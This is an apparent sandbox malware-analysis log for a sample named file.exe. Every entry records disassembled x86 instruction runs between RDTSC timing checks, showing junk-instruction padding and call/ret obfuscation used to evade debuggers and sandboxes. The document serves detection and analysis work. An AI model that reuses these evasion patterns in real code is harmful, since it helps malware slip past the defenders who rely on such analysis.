                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F968C8 second address: F968CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F968CE second address: F968D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F968D7 second address: F96909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC44h 0x00000009 pop edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F1F50CBBC4Ah 0x00000013 jmp 00007F1F50CBBC3Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96909 second address: F9690D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96A8E second address: F96A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F1F50CBBC36h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96CE3 second address: F96CED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F50F7797Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97291 second address: F972B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F972B0 second address: F972DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F1F50F77976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F1F50F77986h 0x00000014 pushad 0x00000015 popad 0x00000016 js 00007F1F50F77976h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F972DF second address: F972E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F972E8 second address: F972F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F50F77976h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F972F2 second address: F9730A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97487 second address: F97490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97490 second address: F97494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97494 second address: F9749C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F975E4 second address: F97615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F1F50CBBC40h 0x0000000f ja 00007F1F50CBBC3Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C7B0 second address: F8C7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C7B4 second address: F8C7D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C7D1 second address: F8C7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97D5C second address: F97D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97D60 second address: F97D6A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1F50F77976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97D6A second address: F97D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97ED8 second address: F97EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1F50F77976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F97EE4 second address: F97EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9806F second address: F98075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98075 second address: F98079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98079 second address: F98082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98082 second address: F98088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98088 second address: F98098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F50F77976h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F98098 second address: F980B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1F50CBBC36h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F50CBBC3Fh 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9B971 second address: F9B977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9E079 second address: F9E080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3773 second address: FA3791 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1F50F7797Ah 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F1F50F7797Ch 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3BCE second address: FA3BD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3BD4 second address: FA3BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3BDD second address: FA3BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3BE3 second address: FA3C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1F50F77976h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1F50F77983h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA3D80 second address: FA3DBB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F50CBBC38h 0x00000008 jng 00007F1F50CBBC3Ch 0x0000000e js 00007F1F50CBBC36h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F1F50CBBC3Ch 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f jp 00007F1F50CBBC36h 0x00000025 jbe 00007F1F50CBBC36h 0x0000002b push esi 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6BD6 second address: FA6BF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F1F50F77980h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6BF0 second address: FA6BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C90 second address: FA8C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C96 second address: FA8CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 56E3A996h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F1F50CBBC38h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D2D4Ah], ebx 0x00000031 call 00007F1F50CBBC39h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8CDE second address: FA8CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9151 second address: FA9156 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9910 second address: FA991A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA400 second address: FAA468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F1F50CBBC38h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov esi, dword ptr [ebp+122D3512h] 0x00000027 or dword ptr [ebp+122D1B26h], eax 0x0000002d push 00000000h 0x0000002f mov esi, dword ptr [ebp+122D3726h] 0x00000035 push 00000000h 0x00000037 xor dword ptr [ebp+122D28B8h], esi 0x0000003d xchg eax, ebx 0x0000003e jc 00007F1F50CBBC40h 0x00000044 pushad 0x00000045 push edx 0x00000046 pop edx 0x00000047 jg 00007F1F50CBBC36h 0x0000004d popad 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1F50CBBC3Dh 0x00000056 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAD660 second address: FAD664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAD664 second address: FAD66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADF34 second address: FADF3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFBE1 second address: FAFBE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADF3A second address: FADF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFBE5 second address: FAFBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADF40 second address: FADF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFBEB second address: FAFBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F1F50CBBC36h 0x00000011 popad 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0271 second address: FB0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0D33 second address: FB0D39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0A70 second address: FB0A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F1F50F77978h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0D39 second address: FB0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1F50CBBC36h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0DDF second address: FB0DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0DE5 second address: FB0DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2367 second address: FB238D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F1F50F77976h 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB15F3 second address: FB1609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 jmp 00007F1F50CBBC3Bh 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB238D second address: FB2391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2391 second address: FB239A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3FC1 second address: FB3FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB41BF second address: FB41C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB41C8 second address: FB41CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5245 second address: FB5249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5249 second address: FB5257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6FBA second address: FB6FD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6FD7 second address: FB7030 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F50F7797Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F1F50F77976h 0x00000013 push 00000000h 0x00000015 sub dword ptr [ebp+122D194Ah], edx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F1F50F77978h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F1F50F77983h 0x0000003f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7030 second address: FB7035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7035 second address: FB703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F94 second address: FB7F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7F98 second address: FB7FB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F1F50F77984h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7FB8 second address: FB801A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F1F50CBBC38h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 movsx edi, bx 0x00000028 mov dword ptr [ebp+122D1817h], ecx 0x0000002e push 00000000h 0x00000030 or dword ptr [ebp+122D1817h], edx 0x00000036 push 00000000h 0x00000038 cld 0x00000039 xchg eax, esi 0x0000003a js 00007F1F50CBBC3Ah 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edi 0x00000045 pop edi 0x00000046 jno 00007F1F50CBBC36h 0x0000004c popad 0x0000004d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB801A second address: FB8020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8020 second address: FB8024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8024 second address: FB8028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB81DC second address: FB81E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1F50CBBC36h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8FB3 second address: FB9020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D34D2h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F1F50F77978h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D1E53h], ebx 0x0000002f or ebx, dword ptr [ebp+12498675h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F1F50F77978h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 jmp 00007F1F50F7797Ah 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9020 second address: FB9028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9028 second address: FB9035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9035 second address: FB903B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB903B second address: FB9040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA074 second address: FBA100 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F1F50CBBC3Ch 0x00000010 pop edx 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F1F50CBBC38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+1246B07Ch] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F1F50CBBC38h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 jmp 00007F1F50CBBC47h 0x00000056 push 00000000h 0x00000058 xchg eax, esi 0x00000059 jng 00007F1F50CBBC3Eh 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA100 second address: FBA10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB919B second address: FB91A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
